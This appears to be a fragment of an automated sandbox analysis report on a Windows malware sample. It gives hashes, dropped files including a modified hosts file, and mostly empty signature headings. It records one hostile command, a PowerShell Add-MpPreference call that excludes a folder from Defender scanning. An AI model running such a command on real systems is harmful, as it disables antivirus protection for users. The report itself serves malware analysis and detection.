Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

ID:	553368
Product:	CloudBasic
Start time:	19:10:32
Start date:	14.01.2022
Sample:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	8fb77edbae0c40e1e19d82a406b7615a
SHA1:	0d1580519970aadaae7a4771bba39668ac0c583f
SHA256:	5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e170063a684e21bcf078
Filetype:	Win64 Executable (generic) (12005/4) 74.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fx1ezon.lgh.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pie02pg.wgf.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uqrqs4k.34i.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ab5jticm.dks.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amblrihn.2wj.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drkkekrp.vde.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eovqy115.iwl.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hm5i3shc.tba.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaxyhgqf.de5.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwaaxnaf.rts.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzwl01ox.zis.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgos0k0z.2gr.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\Desktop\hosts.bak. (copy)	ASCII text, with very long lines, with no line terminators	7EA0FCED249EA6AF785C5BED13F34336	175059CCA534954759EDFD57BE79BE64D709004C	18584FE64395B0D826EA692E83B27B4533C47E32097D94269C48F5D19713E8B4
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.9GYwnzwR.20220114191133.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	1D25826DC4C810920BB7043A30AE63D2	436CD6DB47BD2FA18FD9894FB555CA85D0691F6C	BC2F4B75059261F23D47FA9576994D2AA1BD7A7C6229247F806D0650832F3282
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.Gl0sshOE.20220114191151.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	3290B019E42A1E78B3283DD28F0661C3	D42E3457C990593097D757AB2D3B0773CC11BB18	4DDD8C0735832D92EA6A6ACFD946E21B09F294D6BA9EF26CE80990171A30AF82
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.IZ24yRiA.20220114191200.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	A8930FE14D4FC2754F54AEFE62DFDCE6	56E5460F3F9016DE19C236FC5227B22EE10C8847	86553318C3C4409CC0D5D12D87B22D66E6227F6280DCE7B1AA73A9AC54865CA2
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.PhAlNio2.20220114191140.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	2BB66BADA2AA66EBFB5A113905A90C49	2C3334B7D66F07C03644215E467F083AD5D89238	704D02101792089CDB8C56257196B1A2ED153AA4AA9EA3558E6C64707A6025F4
C:\Users\user\Documents\20220114\PowerShell_transcript.358075._bhdDFjc.20220114191205.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	2F603ABDABD1B16AAE8EFAAF1013FDA8	C83105F78E3290BAB49329B87CA417BA3CD00081	BE7CC110A610AE0A60E00E8ABD5A41177CA779EB47E02284D1F89ED7F8DC8DD8
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.modYJzHz.20220114191155.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	541EBD96FE5F89B568C4F516BD606AED	4565038A42D265855BEA5C8F5D78B7C39781FFA6	1A74BF462436C37C738EBE17DCD53254BBB84F2DAE22BC6C03C079E5B541E825
C:\Windows\System32\drivers\etc\hosts	ASCII text, with very long lines, with no line terminators	7EA0FCED249EA6AF785C5BED13F34336	175059CCA534954759EDFD57BE79BE64D709004C	18584FE64395B0D826EA692E83B27B4533C47E32097D94269C48F5D19713E8B4
\Device\Null	ASCII text, with CRLF line terminators	EC0CD8FB16185F3892DD2C39D6FC2FE9	53FB6A2E739DA030FE1D1BBFB9481E0CDE1765F7	0183B25F759F83A5F6F6330B9AFA0078E6B23BD0081CFAD7ACD7925976DE392F

Windows Analysis Report 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

DDoS:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs